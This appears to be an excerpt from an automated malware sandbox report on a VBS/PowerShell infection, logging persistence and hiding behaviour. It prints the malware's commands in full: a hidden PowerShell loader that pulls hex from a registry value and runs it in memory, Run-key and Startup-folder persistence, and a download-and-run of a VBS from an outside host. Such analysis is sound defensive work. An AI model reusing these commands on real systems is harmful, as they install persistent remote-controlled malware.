Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Windows Shell Script Host drops VBS filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\nUleFczcAh.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbsJump to behavior

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft C:\Users\user\AppData\Roaming\microsoft.vbs
Creates multiple autostart registry keysShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAhJump to behavior
Drops VBS files to the startup folderShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbsJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbsJump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbsJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Creates an autostart registry keyShow sources
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nUleFczcAhJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nUleFczcAhJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAhJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAhJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
